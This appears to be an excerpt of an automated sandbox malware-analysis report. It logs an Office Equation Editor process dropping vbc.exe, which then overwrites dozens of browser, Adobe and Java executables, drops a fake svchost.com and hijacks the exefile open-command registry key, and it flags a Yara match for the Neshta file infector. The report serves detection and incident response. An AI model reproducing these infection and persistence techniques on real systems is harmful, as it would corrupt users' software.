Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Microsoft Office\Office14\MSOHTMED.EXE	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Common Files\microsoft shared\TextConv\WksConv\Wkconv.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Mozilla Firefox\uninstall\helper.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Google\Update\Install\{FCE087CB-E39B-4153-8CDB-9F0ACA90F73B}\GoogleUpdateSetup.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateComRegisterShell64.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Mozilla Firefox\wow_helper.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\ProgramData\Oracle\Java\javapath_target_415196\java.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\WinDirStat\windirstat.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleCrashHandler.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\Installer\chrmstp.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\AutoIt3\Uninstall.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleCrashHandler64.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\WinDirStat\Uninstall.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\ProgramData\Oracle\Java\javapath_target_415196\javaws.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\notification_helper.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdate.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateOnDemand.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\ProgramData\Oracle\Java\javapath_target_415196\javaw.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\ProgramData\Package Cache\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\VC_redist.x64.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Google\Update\Download\{430FD4D0-B729-4F61-AA34-91526481799D}\1.3.36.102\GoogleUpdateSetup.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\chrome_pwa_launcher.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Mozilla Firefox\maintenanceservice_installer.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateBroker.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateSetup.exe	Jump to behavior

Drops PE files with a suspicious file extension

Show sources

Source: C:\Users\Public\vbc.exe

File created: C:\Windows\svchost.com

Jump to dropped file

Drops executable to a common third party application directory

Show sources

Source: C:\Users\Public\vbc.exe	File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	File written: C:\Program Files (x86)\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	File written: C:\Program Files (x86)\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	File written: C:\Program Files (x86)\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	File written: C:\Program Files (x86)\Mozilla Firefox\maintenanceservice_installer.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	File written: C:\Program Files (x86)\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	File written: C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	File written: C:\Program Files (x86)\Mozilla Firefox\uninstall\helper.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	File written: C:\Program Files (x86)\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	File written: C:\Program Files (x86)\Mozilla Firefox\wow_helper.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	File written: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe	Jump to behavior

Source: C:\Users\Public\vbc.exe	File created: C:\ProgramData\Oracle\Java\javapath_target_415196\javaw.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\ProgramData\Package Cache\{e2803110-78b3-4664-a479-3611a381656a}\VC_redist.x86.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\ProgramData\Package Cache\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\VC_redist.x64.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\ProgramData\Oracle\Java\javapath_target_415196\java.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\ProgramData\Oracle\Java\javapath_target_415196\javaws.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe	Jump to dropped file

Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\setup.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\ProgramData\Package Cache\{e2803110-78b3-4664-a479-3611a381656a}\VC_redist.x86.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\Installer\setup.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Google\Chrome\Application\chrome_proxy.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\elevation_service.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateCore.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Mozilla Firefox\updater.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Windows\svchost.com	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Microsoft Office\Office14\MSOHTMED.EXE	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Common Files\microsoft shared\TextConv\WksConv\Wkconv.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Mozilla Firefox\uninstall\helper.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Google\Update\Install\{FCE087CB-E39B-4153-8CDB-9F0ACA90F73B}\GoogleUpdateSetup.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Mozilla Firefox\wow_helper.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\ProgramData\Oracle\Java\javapath_target_415196\java.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C\dwtrig20.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\WinDirStat\windirstat.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Mozilla Firefox\maintenanceservice.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleCrashHandler.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\Installer\chrmstp.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\AutoIt3\Uninstall.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleCrashHandler64.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\WinDirStat\Uninstall.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\ProgramData\Oracle\Java\javapath_target_415196\javaws.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\notification_helper.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdate.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateOnDemand.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\ProgramData\Oracle\Java\javapath_target_415196\javaw.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\ProgramData\Package Cache\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\VC_redist.x64.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Google\Update\Download\{430FD4D0-B729-4F61-AA34-91526481799D}\1.3.36.102\GoogleUpdateSetup.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Mozilla Firefox\minidump-analyzer.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C\DW20.EXE	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\chrome_pwa_launcher.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\ose.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Mozilla Firefox\maintenanceservice_installer.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Mozilla Firefox\crashreporter.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateBroker.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateSetup.exe	Jump to dropped file

Source: C:\Users\Public\vbc.exe

File created: C:\Windows\svchost.com

Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Yara detected Neshta

Show sources

Source: Yara match	File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Creates an undocumented autostart registry key

Show sources

Source: C:\Users\Public\vbc.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command NULL

Jump to behavior

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
